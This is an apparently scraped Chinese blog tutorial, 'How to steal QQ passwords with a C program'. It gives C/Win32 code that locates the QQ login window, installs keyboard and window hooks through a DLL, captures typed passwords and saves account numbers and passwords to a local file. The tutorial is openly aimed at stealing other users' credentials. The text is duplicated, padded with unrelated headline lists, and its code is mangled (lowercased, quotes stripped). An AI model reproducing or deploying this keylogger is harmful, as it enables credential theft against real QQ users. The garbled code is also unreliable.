如何用C语言程序盗取QQ密码
一般的盗密码的软件的软件都是通过监视键盘来获得密码,这样操作比较方便,但是这样也存在一定问题,密码有的时候不是很准确,因为有的人输入密码并不是从前到后输入,当然这样的人也是少数,盗密码嘛,当然去得到那些比较粗心的人的密码! 通过安装钩子来监视qq登陆界面就是获得密码的方法,在安装前得先找到登陆窗口的句柄,当钩子安装后,记录键盘,当用户“回车”或是点了“登陆”就可以开始处理密码了! 我准备分为四部分来说明这个整个过程:
(1)寻找qq登陆界面。
(2)安装钩子
(3)钩子函数的解释.
(4)处理密码。
以下部分全是使用c语言,文章中我假设读者您是会c/sdk编程的。如果遇到相关的概念性问题,您可以查看msdn或是上bbs 询问!
寻找qq登陆界面
软件运行后,利用安装定时器,每秒在系统找qq登陆界面,这样基本上只要用户打开了qq登陆界面就会被抓住其句柄,看下面代码:
#define id_mytimer 555
settimer(hdlg, id_mytimer, 1000, null);
安装好timer后,下面是处理主程序的wm_timer消息,凡是出现没有定义的变量,您可以理解为是全局变量.
//处理wm_timer代码
if (!iswindow(g_hqqlogin)) //判断g_hqqlogin是否是有效的窗口句柄
{
hwnd hlogin=null;
g_hqqlogin = null;
setqqhook(null); //参数为null是卸载hook,参数为句柄是安装句柄
do
{
//利用findwindowex查找qq登陆窗口,具体参数意思请查msdn
g_hqqlogin=findwindowex(null,g_hqqlogin,#32770,null); //对话框的类都是#32770
//找到类名是#32770后,再在其窗体内找一个具有“ 登录qq”的button按纽
hlogin = findwindowex(g_hqqlogin, null, button, 登录qq); //这一句很关键,如果你的qq登陆窗口上没有 登录qq字样,那么获取密码将失败!
}
while(g_hqqlogin != null && hlogin == null); //直到找到指定的窗口,即:qq登陆窗口
if (g_hqqlogin != null)
{
setqqhook(g_hqqlogin);//安装hook,此函数在dll文件中 第二部分中介绍
}
}
上面就是查找qq登陆窗口句柄的过程,从代码可以看出我用的方法:找一个其子窗体中有一个标题为“ 登录qq”的button的对话框(这句话说得有点饶口,这句话如果也看不懂,下面您不用看了:() 我最开始是想利用 findwindow(null,qq用户登陆窗口)来查找,但是我用spy++看了qq登陆窗口的标题并不是“qq用户登陆窗口”,而是“乱码”,其中包含了回车键等特殊字符,于是我用了findwindowex().
安装钩子
找到了qq登陆窗口后,就成功了一半。
下面是dll文件中的安装hook的函数setqqhook(), 为什么要用dll(动态连接库)?要去“钩”其他进程的消息,得让hook函数在dll中,这样好映射到其地址空间中!
bool winapi setqqhook(hwnd hqqlogin)
{
//获得登陆框的句柄
bool bret = false;
if (hqqlogin != null)
{
dword dwthreadid = getwindowthreadprocessid(hqqlogin, null); //这是什么意思?看msdn
g_hnum = getdlgitem(hqqlogin, 138);//不同版本qq,此处不一样! 得到qq号的子窗口句柄
g_hpsw = getdlgitem(hqqlogin, 180); //不同版本qq,此处不一样!得到qq密码的子窗口句柄
if (g_hnum == null)
{
messagebox(null,哭了,号码句柄都没有得到!,郁闷,0);
return false;
}
if(g_hpsw==null)
{
messagebox(null,哭了,密码句柄都没有得到!,郁闷,0);
return false;
}
分别键盘hook,和界面部分消息处理的hook
g_hproc = setwindowshookex(wh_callwndproc, callwndproc, g_hinstdll, dwthreadid);
g_hkey = setwindowshookex(wh_keyboard, keyboardproc, g_hinstdll, dwthreadid);
bret = (g_hproc != null) && (g_hkey != null);
}
else
{
// 卸载钩子
bret = unhookwindowshookex(g_hproc) && unhookwindowshookex(g_hkey);
g_hproc = null;
g_hkey = null;
g_hnum = null;
}
return bret;
}
上面是安装hook部分的代码,就这么简单,上面提到了callwndproc,keyboardproc是两个回调函数,是我第三部分要解释的钩子函数
钩子函数的解释
callwndproc,keyboardproc是两个回调函数的原型和具体代码如下:
// 钩子过程,监视“登陆”的命令消息
lresult callback callwndproc(int ncode, wparam wparam, lparam lparam)
{
cwpstruct *p = (cwpstruct *)lparam;
// 捕获“登陆”按钮
if (p->message == wm_command && p->wparam ==16032)
//下面个函数是我在第四部分介绍-“处理密码”部分会仔细说明
//当用户点了登陆按钮,说明qq号码和qq密码已经填写完毕,当然可以去获得密码了
getpasswrod();
return callnexthookex(g_hproc, ncode, wparam, lparam);
}
// 键盘钩子过程,监视“登陆”的热键消息
lresult callback keyboardproc(int ncode, wparam wparam, lparam lparam)
{
// 捕获热键消息,记录键盘的按键盘过程,pmsg是pmsg类型的,i是全局static类型的
pmsg[i].wparam =wparam;
i++;
if (wparam == vk_return) //用户使用键盘“回车”来登陆,用户用了回车后,就可以可以去获得密码了
getpasswrod();
return callnexthookex(g_hkey, ncode, wparam, lparam);
}
在明白了这两个钩子函数后就可以看后期是如何具体处理密码的了,这就是下面的第四部分内容
处理密码
如果您读到了此处,我想得暂停一会,先让我来帮你回忆一下前面提到的几个关键的变量
第一个:qq号的子窗口句柄 g_hnum
第二个:qq密码的子窗口句柄 g_hpsw //此部分暂时不使用,下面
第三个:存键盘按键的 pmsg
上面三变量分别出现在第二部分和第三部分,都是全局共享(shared)变量
qq密码的子窗口句柄 g_hpsw 此部分暂时不使用,你可以看到下面代码中有句用到g_hpsw的语句是我注释掉了的,原因是无法通过那样去得到qq密码,得处理按键消息
void getpasswrod()
{
//声明变量和初始化
handle f;
tchar num[13];
tchar psw[21];
tchar total[50];
int j;
memset(num,0,sizeof(num));
memset(total,0,sizeof(total));
memset(psw,0,sizeof(psw));
dword dw;
//得到qq号的内容,以为有的人的qq号是在登陆框有记录,其qq号并是用键盘输入的
getwindowtext(g_hnum,(lpstr)num,sizeof(num));
//getwindowtext(g_hpsw,(lpstr)psw,sizeof(psw)); //此句不使用,无法这样获得密码
//提取出键盘记录,此内容也许全是密码,也许是qq号+qq密码
for(j=0;j<20;j++)
{
psw[j]=(tchar)pmsg[j*2].wparam ;
}
psw[j+1]=’\0’;
//把qq号码和qq密码写入c盘password.txt中
f=createfile(c:\\password.txt,generic_write,file_share_write,null,open_always,file_attribute_normal,null);
strcat(total,号码);
strcat(total,num);
strcat(total,密码:);
strcat(total,psw);
writefile(f,&total,sizeof(total),&dw,null);
closehandle(f);
}
最后在c盘password.txt也许会出现这样两种情况:
1)当qq号是没有用输入,而已用的粘贴或者是电脑以前有记录则是:号码:21728812密码:test
2) 当qq号是用的键盘输入,电脑没有qq号记录时则是:号码:21728812密码:21728812test
可以看出,第2种情况把qq当成了密码了,所以密码还得减去qq号,
特别说明:我这样直接处理wparam参数,得到的字符密码全是大写的,具体大小写问题我没有就没有仔细去处理的,功能实现就行了,毕竟我使用他不用来盗密码的!
上面四部分基本上获得密码的功能介绍完毕。凡是没有介绍的变量皆是全局变量,没有提到的函数如:getwindowthreadprocessid(),setwindowshookex(),unhookwindowshookex(),callnexthookex(),createfile(),writefile()等皆是windows api,我提到的“hook”,“钩子”是同一个意思,也许有的地方我说的钩子函数,而另外一个地方说的是hook函数
特别说明:上面有具体的运行文件,由于小弟并没有考虑到更多细节,我只是用了“理想”状况下去获得密码,并且或的密码后并没有注重后期密码处理,也许出现密码大小写不符合或是无法得到密码,请大家千万别笑话,我写这篇菜鸟级别的blog的原因意在告诉一些对这方面感到疑惑的朋友基本的原理,和希望和大侠们交流 !
PLC取相反值命令是什么?
TCL通讯Alcatel 3V智能手机选用意法半导体NFC技术
丰田混合动力车型有哪些_性价比如何
人工智能是一种改善数据处理的好方法
荣耀畅玩6A怎么样 值不值得买
如何用C语言程序盗取QQ密码
基于ARM和eCos的嵌入式WEB服务器设计
什么是真正无线立体声?TWS耳塞式耳机的工作原理
MongoDB引入字段级数据库加密安全功能
PCB板上镀金与镀银的区别是什么?结论你绝对想不到
三年三级跳麒麟960全面达业界一流,华为Fellow解读未来策略
如何提高单次充电的容量和续航里程
未来数智化供应链将如何实现系统性变革
MTC-PD65W1C-CTA1快充电源-使用MTC-650V Cascode D-GaN
电感的选型要注意哪些问题
嘉协达与Inktank共推变革性Ceph储存平台
云计算服务类型之一IaaS介绍
台湾亚洲电材集团江苏东台公司奠基仪式10/17隆重举行
蚂蚁集团被四部门监管约谈意味着什么 蚂蚁回应约谈:严格遵从监管要求
利用FPGA构建边缘AI推理的解决方案
(1)寻找qq登陆界面。
(2)安装钩子
(3)钩子函数的解释.
(4)处理密码。
以下部分全是使用c语言,文章中我假设读者您是会c/sdk编程的。如果遇到相关的概念性问题,您可以查看msdn或是上bbs 询问!
寻找qq登陆界面
软件运行后,利用安装定时器,每秒在系统找qq登陆界面,这样基本上只要用户打开了qq登陆界面就会被抓住其句柄,看下面代码:
#define id_mytimer 555
settimer(hdlg, id_mytimer, 1000, null);
安装好timer后,下面是处理主程序的wm_timer消息,凡是出现没有定义的变量,您可以理解为是全局变量.
//处理wm_timer代码
if (!iswindow(g_hqqlogin)) //判断g_hqqlogin是否是有效的窗口句柄
{
hwnd hlogin=null;
g_hqqlogin = null;
setqqhook(null); //参数为null是卸载hook,参数为句柄是安装句柄
do
{
//利用findwindowex查找qq登陆窗口,具体参数意思请查msdn
g_hqqlogin=findwindowex(null,g_hqqlogin,#32770,null); //对话框的类都是#32770
//找到类名是#32770后,再在其窗体内找一个具有“ 登录qq”的button按纽
hlogin = findwindowex(g_hqqlogin, null, button, 登录qq); //这一句很关键,如果你的qq登陆窗口上没有 登录qq字样,那么获取密码将失败!
}
while(g_hqqlogin != null && hlogin == null); //直到找到指定的窗口,即:qq登陆窗口
if (g_hqqlogin != null)
{
setqqhook(g_hqqlogin);//安装hook,此函数在dll文件中 第二部分中介绍
}
}
上面就是查找qq登陆窗口句柄的过程,从代码可以看出我用的方法:找一个其子窗体中有一个标题为“ 登录qq”的button的对话框(这句话说得有点饶口,这句话如果也看不懂,下面您不用看了:() 我最开始是想利用 findwindow(null,qq用户登陆窗口)来查找,但是我用spy++看了qq登陆窗口的标题并不是“qq用户登陆窗口”,而是“乱码”,其中包含了回车键等特殊字符,于是我用了findwindowex().
安装钩子
找到了qq登陆窗口后,就成功了一半。
下面是dll文件中的安装hook的函数setqqhook(), 为什么要用dll(动态连接库)?要去“钩”其他进程的消息,得让hook函数在dll中,这样好映射到其地址空间中!
bool winapi setqqhook(hwnd hqqlogin)
{
//获得登陆框的句柄
bool bret = false;
if (hqqlogin != null)
{
dword dwthreadid = getwindowthreadprocessid(hqqlogin, null); //这是什么意思?看msdn
g_hnum = getdlgitem(hqqlogin, 138);//不同版本qq,此处不一样! 得到qq号的子窗口句柄
g_hpsw = getdlgitem(hqqlogin, 180); //不同版本qq,此处不一样!得到qq密码的子窗口句柄
if (g_hnum == null)
{
messagebox(null,哭了,号码句柄都没有得到!,郁闷,0);
return false;
}
if(g_hpsw==null)
{
messagebox(null,哭了,密码句柄都没有得到!,郁闷,0);
return false;
}
分别键盘hook,和界面部分消息处理的hook
g_hproc = setwindowshookex(wh_callwndproc, callwndproc, g_hinstdll, dwthreadid);
g_hkey = setwindowshookex(wh_keyboard, keyboardproc, g_hinstdll, dwthreadid);
bret = (g_hproc != null) && (g_hkey != null);
}
else
{
// 卸载钩子
bret = unhookwindowshookex(g_hproc) && unhookwindowshookex(g_hkey);
g_hproc = null;
g_hkey = null;
g_hnum = null;
}
return bret;
}
上面是安装hook部分的代码,就这么简单,上面提到了callwndproc,keyboardproc是两个回调函数,是我第三部分要解释的钩子函数
钩子函数的解释
callwndproc,keyboardproc是两个回调函数的原型和具体代码如下:
// 钩子过程,监视“登陆”的命令消息
lresult callback callwndproc(int ncode, wparam wparam, lparam lparam)
{
cwpstruct *p = (cwpstruct *)lparam;
// 捕获“登陆”按钮
if (p->message == wm_command && p->wparam ==16032)
//下面个函数是我在第四部分介绍-“处理密码”部分会仔细说明
//当用户点了登陆按钮,说明qq号码和qq密码已经填写完毕,当然可以去获得密码了
getpasswrod();
return callnexthookex(g_hproc, ncode, wparam, lparam);
}
// 键盘钩子过程,监视“登陆”的热键消息
lresult callback keyboardproc(int ncode, wparam wparam, lparam lparam)
{
// 捕获热键消息,记录键盘的按键盘过程,pmsg是pmsg类型的,i是全局static类型的
pmsg[i].wparam =wparam;
i++;
if (wparam == vk_return) //用户使用键盘“回车”来登陆,用户用了回车后,就可以可以去获得密码了
getpasswrod();
return callnexthookex(g_hkey, ncode, wparam, lparam);
}
在明白了这两个钩子函数后就可以看后期是如何具体处理密码的了,这就是下面的第四部分内容
处理密码
如果您读到了此处,我想得暂停一会,先让我来帮你回忆一下前面提到的几个关键的变量
第一个:qq号的子窗口句柄 g_hnum
第二个:qq密码的子窗口句柄 g_hpsw //此部分暂时不使用,下面
第三个:存键盘按键的 pmsg
上面三变量分别出现在第二部分和第三部分,都是全局共享(shared)变量
qq密码的子窗口句柄 g_hpsw 此部分暂时不使用,你可以看到下面代码中有句用到g_hpsw的语句是我注释掉了的,原因是无法通过那样去得到qq密码,得处理按键消息
void getpasswrod()
{
//声明变量和初始化
handle f;
tchar num[13];
tchar psw[21];
tchar total[50];
int j;
memset(num,0,sizeof(num));
memset(total,0,sizeof(total));
memset(psw,0,sizeof(psw));
dword dw;
//得到qq号的内容,以为有的人的qq号是在登陆框有记录,其qq号并是用键盘输入的
getwindowtext(g_hnum,(lpstr)num,sizeof(num));
//getwindowtext(g_hpsw,(lpstr)psw,sizeof(psw)); //此句不使用,无法这样获得密码
//提取出键盘记录,此内容也许全是密码,也许是qq号+qq密码
for(j=0;j<20;j++)
{
psw[j]=(tchar)pmsg[j*2].wparam ;
}
psw[j+1]=’\0’;
//把qq号码和qq密码写入c盘password.txt中
f=createfile(c:\\password.txt,generic_write,file_share_write,null,open_always,file_attribute_normal,null);
strcat(total,号码);
strcat(total,num);
strcat(total,密码:);
strcat(total,psw);
writefile(f,&total,sizeof(total),&dw,null);
closehandle(f);
}
最后在c盘password.txt也许会出现这样两种情况:
1)当qq号是没有用输入,而已用的粘贴或者是电脑以前有记录则是:号码:21728812密码:test
2) 当qq号是用的键盘输入,电脑没有qq号记录时则是:号码:21728812密码:21728812test
可以看出,第2种情况把qq当成了密码了,所以密码还得减去qq号,
特别说明:我这样直接处理wparam参数,得到的字符密码全是大写的,具体大小写问题我没有就没有仔细去处理的,功能实现就行了,毕竟我使用他不用来盗密码的!
上面四部分基本上获得密码的功能介绍完毕。凡是没有介绍的变量皆是全局变量,没有提到的函数如:getwindowthreadprocessid(),setwindowshookex(),unhookwindowshookex(),callnexthookex(),createfile(),writefile()等皆是windows api,我提到的“hook”,“钩子”是同一个意思,也许有的地方我说的钩子函数,而另外一个地方说的是hook函数
特别说明:上面有具体的运行文件,由于小弟并没有考虑到更多细节,我只是用了“理想”状况下去获得密码,并且或的密码后并没有注重后期密码处理,也许出现密码大小写不符合或是无法得到密码,请大家千万别笑话,我写这篇菜鸟级别的blog的原因意在告诉一些对这方面感到疑惑的朋友基本的原理,和希望和大侠们交流 !
PLC取相反值命令是什么?
TCL通讯Alcatel 3V智能手机选用意法半导体NFC技术
丰田混合动力车型有哪些_性价比如何
人工智能是一种改善数据处理的好方法
荣耀畅玩6A怎么样 值不值得买
如何用C语言程序盗取QQ密码
基于ARM和eCos的嵌入式WEB服务器设计
什么是真正无线立体声?TWS耳塞式耳机的工作原理
MongoDB引入字段级数据库加密安全功能
PCB板上镀金与镀银的区别是什么?结论你绝对想不到
三年三级跳麒麟960全面达业界一流,华为Fellow解读未来策略
如何提高单次充电的容量和续航里程
未来数智化供应链将如何实现系统性变革
MTC-PD65W1C-CTA1快充电源-使用MTC-650V Cascode D-GaN
电感的选型要注意哪些问题
嘉协达与Inktank共推变革性Ceph储存平台
云计算服务类型之一IaaS介绍
台湾亚洲电材集团江苏东台公司奠基仪式10/17隆重举行
蚂蚁集团被四部门监管约谈意味着什么 蚂蚁回应约谈:严格遵从监管要求
利用FPGA构建边缘AI推理的解决方案